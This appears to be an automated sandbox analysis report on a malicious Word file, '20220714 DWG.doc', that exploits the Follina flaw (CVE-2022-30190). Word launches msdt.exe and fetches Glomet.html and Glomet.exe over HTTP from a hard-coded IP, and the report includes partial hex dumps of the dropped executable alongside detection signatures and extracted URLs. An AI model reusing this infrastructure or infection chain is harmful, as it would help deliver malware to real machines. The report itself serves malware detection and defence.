Windows Analysis Report
20220714 DWG.doc

Overview

General Information

Sample Name: 20220714 DWG.doc
Analysis ID: 665041
MD5: 5fd0deaaca6ac9645ba3e9aa8af3311c
SHA1: 4823c45cde3606a5189462a8c4441686706d04f3
SHA256: b78c36823ab0b86b683d165e53405855b8e910c5011997e5a4a4620200cffc0a
Tags: doc
Infos:

Detection

Follina CVE-2022-30190
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Obfuscated command line found
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
PE file contains more sections than normal
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: 20220714 DWG.doc Virustotal: Detection: 8% Perma Link

Exploits
barindex
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Source: Yara match File source: 0000000D.00000002.576330720.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.576021489.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.576945424.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: C:\ProgramData\Glomet.exe Registry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\Gratinr\Wr242\Boomerangernes\Hypercenosis Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.29.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.29.dr
Source: C:\ProgramData\Glomet.exe Code function: 29_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 29_2_00405A19
Source: C:\ProgramData\Glomet.exe Code function: 29_2_004065CE FindFirstFileA,FindClose, 29_2_004065CE
Source: C:\ProgramData\Glomet.exe Code function: 29_2_004027AA FindFirstFileA, 29_2_004027AA

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.3:49743 -> 45.141.237.18:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.3:49744 -> 45.141.237.18:80
Source: winword.exe Memory has grown: Private usage: 0MB later: 110MB
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /Glomet.exe HTTP/1.1Host: 45.141.237.18Connection: Keep-Alive
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Thu, 14 Jul 2022 21:48:58 GMTAccept-Ranges: bytesETag: "7dc29185cb97d81:0"Server: Microsoft-IIS/10.0Date: Fri, 15 Jul 2022 13:28:25 GMTContent-Length: 346688Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 29 81 e9 50 47 d2 e9 50 47 d2 e9 50 47 d2 2a 5f 18 d2 eb 50 47 d2 e9 50 46 d2 49 50 47 d2 2a 5f 1a d2 e6 50 47 d2 bd 73 77 d2 e3 50 47 d2 2e 56 41 d2 e8 50 47 d2 52 69 63 68 e9 50 47 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3c 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 66 00 00 00 7c 02 00 00 04 00 00 b3 33 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 04 00 00 04 00 00 d1 f2 05 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 85 00 00 a0 00 00 00 00 80 04 00 d0 1f 00 00 00 00 00 00 00 00 00 00 50 2b 05 00 f0 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ba 65 00 00 00 10 00 00 00 66 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 13 00 00 00 80 00 00 00 14 00 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 55 02 00 00 a0 00 00 00 06 00 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 01 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 d0 1f 00 00 00 80 04 00 00 20 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /Glomet.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 45.141.237.18Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Glomet.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 45.141.237.18If-Modified-Since: Thu, 14 Jul 2022 16:59:59 GMTIf-None-Match: "80119226a397d81:0"Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /icons/ubuntu-logo.png HTTP/1.1Accept: */*Referer: http://45.141.237.18/Glomet.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.141.237.18Connection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Date: Fri, 15 Jul 2022 13:26:43 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 7
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: text/htmlContent-Encoding: gzipLast-Modified: Thu, 14 Jul 2022 16:59:59 GMTAccept-Ranges: bytesETag: "80119226a397d81:0"Vary: Accept-EncodingServer: Microsoft-IIS/10.0Date: Fri, 15 Jul 2022 13:26:41 GMTContent-Length: 4357Data Raw: 1f 8b 08 00 00 00 00 00 04 00 bc 5a 7b 77 da c8 92 ff 7f ce 99 ef a0 70 f7 1e 4c 02 08 49 3c 84 6d bc 27 f1 23 f1 ac f3 18 db 49 26 ce e6 78 5b 52 0b 34 16 6a 5d a9 65 4c b2 f9 ee 5b d5 dd 12 02 04 38 73 37 c3 b1 0c 52 77 d7 ab ab 7e 55 d5 70 f8 c4 63 2e 9f c7 54 9b f0 69 78 f4 eb 2f 87 f8 ae 85 24 1a 8f 6a 34 aa e1 93 27 ad d6 af bf 68 f0 7a cd bc c0 0f a8 a7 f9 09 9b 6a 7c 42 b5 13 ea 04 24 d2 58 12 8c 83 88 84 9a cf 12 ed bd 93 45 3c 93 2b 2e 48 ca b5 2c f6 08 a7 de be 66 76 8c 7e cb 30 5a 46 5f 8e 5e 51 ba 0f 7c 79 9c ee eb 7a 48 b2 c8 9d c4 c4 6b 47 94 eb 4e 36 4e 75 c3 b4 ed fe b0 83 93 5b ad 23 7c 3b 9c 50 e2 1d c9 d5 87 53 ca 89 58 de a2 ff ca 82 fb 51 ed 98 45 9c 46 bc 75 0d fa d4 34 57 de 8d 6a 9c 3e 70 1d d5 3a d0 dc 09 49 52 ca 47 ef af cf 5a 76 4d d3 73 52 3c e0 21 3d 7a 1e 13 77 42 4d a5 01 28 e7 93 2c e4 da 3b 32 06 39 cf b9 36 63 c9 5d 7a a8 cb c9 6a 65 ca e7 21 d5 d0 82 8a 91 9b a6 35 6d 4a bd 80 8c 6a a9 9b 50 69 44 4d 7b aa 7d 93 4b a6 24 01 63 ed 6b 9d f8 a1 7c 1d c8 51 30 80 17 44 e3 ea e1 ef bf fe 82 6f 0e f3 e6 4d b1 61 39 cd 62 95 05 b3 4b d7 81 5c 00 4b 88 7b 37 4e 58 16 79 2d 97 85 2c d9 d7 fe 71 62 9f bc 38 35 8b 19 3e 98 ab e5 93 69 10 ce f7 b5 0f 34 f1 48 44 9a 5a 4a a2 b4 95 d2 24 f0 0f 4a d3 d2 e0 2b 58 c4 30 62 ae 9e a2 e6 2d 12 06 63 d0 cb 05 a3 d3 a4 2c af 17 dc b7 a7 24 88 6e 63 b0 64 21 32 4b 03 1e 30 58 90 d0 90 f0 e0 9e 2a 5a 5e 90 c6 21 01 21 38 71 42 5a c8 37 0b 3c 3e d9 d7 ec 4e a7 a4 96 b4 65 cb 61 9c b3 e9 be d2 b8 34 10 52 9f ef 6b 24 e3 6c f9 39 f8 eb 64 79 60 8b dd 95 05 59 e2 d1 a4 a5 c4 30 0b 4e ea 79 6e 55 d3 30 07 96 bd 3c 26 7c 64 5f 4b 59 18 78 db 76 e4 4c bc 8a 19 bb 8d 8a f6 bc c5 90 a0 49 6e d6 09 95 aa 0d 87 85 84 4a 64 a3 d3 f9 e7 56 ee bd b3 fe d9 60 1b 8b 34 86 58 5f f1 62 a3 57 b2 57 af 6c b0 b2 a7 d8 82 75 f1 74 a6 84 74 58 e8 6d 63 18 4c c7 ab fc ac 12 bb ee fa fe ec 6f 8a 19 24 2d 1c ea 96 f9 b7 0a 1a d2 9c b8 1b 52 02 4b d1 5b 16 ae 05 6e 92 6f 76 85 cf fd 50 a8 6d d9 58 c5 73 bb 9c b7 01 a7 d3 6d c2 56 6d 71 2e 67 77 93 43 ef 94 33 7f dc 11 af 83 7f 4b 78 b2 ba 91 fd 92 58 fd f5 bd 52 ab 6f 53 ea 22 4a 54 b9 c1 cf 31 fe 0a e3 5b 9c bf 06 b3 68 53 1b 3d 50 be 6f b7 58 39 10 3a 2a 10 76 31 8c 13 ba aa b2 ad 8c 65 57 e7 0b 5b 0d d9 2b 22 2d e3 96 b1 8a 5b 0a 9b 3c 40 50 ea 55 43 5a a1 cc 6e e8 28 2b 2c 09 07 1c 6c ed 3e 4e e7 65 8d 0b 54 df ed 1d 72 7d 16 36 37 0f 86 c1 d6 4d 34 2a 98 e4 eb 97 01 76 29 d5 f6 95 0b f6 b7 bb a0 7d 3a 3c 7e 61 ae 79 49 e1 99 9b 81 71 25 e1 9a ff ac 88 c2 ea dc b0 2c fd 6d 02 65 db b7 8d 02 1e 9f 98 46 f7 6c 07 89 71 42 e7 5b 68 0c cf 86 96 dd 2f d3 68 fb 21 83 cc 1e 8d 6f 69 48 a7 20 e5 ce dc 2f 16 fc 18 ae 34 b7 fa 44 01 3b c2 60 1e 75 59 42 24 e7 88 45 f4 b1 39 69 13 ef fd 30 8
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.141.237.18
Source: ~WRS{D2D7FF17-FD00-4D6F-9BD0-D27E7B55D2C5}.tmp.0.dr String found in binary or memory: http://45.141.237.18/Glomet.html
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: battery-level-90-charging-symbolic.svg.29.dr String found in binary or memory: http://creativecommons.org/licenses/by-sa/4.0/
Source: battery-level-90-charging-symbolic.svg.29.dr String found in binary or memory: http://creativecommons.org/ns#
Source: battery-level-90-charging-symbolic.svg.29.dr String found in binary or memory: http://creativecommons.org/ns#Attribution
Source: battery-level-90-charging-symbolic.svg.29.dr String found in binary or memory: http://creativecommons.org/ns#DerivativeWorks
Source: battery-level-90-charging-symbolic.svg.29.dr String found in binary or memory: http://creativecommons.org/ns#Distribution
Source: battery-level-90-charging-symbolic.svg.29.dr String found in binary or memory: http://creativecommons.org/ns#Notice
Source: battery-level-90-charging-symbolic.svg.29.dr String found in binary or memory: http://creativecommons.org/ns#Reproduction
Source: battery-level-90-charging-symbolic.svg.29.dr String found in binary or memory: http://creativecommons.org/ns#ShareAlike
Source: msdt.exe, 0000000D.00000002.581158371.0000000000D61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: 678899CC.htm.0.dr, Glomet[1].htm.0.dr, FF013E73.htm.0.dr String found in binary or memory: http://httpd.apache.org/docs/2.4/mod/mod_userdir.html
Source: Glomet.exe, Glomet.exe, 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, Glomet.exe, 0000001D.00000000.532501421.000000000040A000.00000008.00000001.01000000.0000000C.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Glomet.exe, 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, Glomet.exe, 0000001D.00000000.532501421.000000000040A000.00000008.00000001.01000000.0000000C.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.aadrm.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.aadrm.com/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.cortana.ai
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.office.net
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.onedrive.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://augloop.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
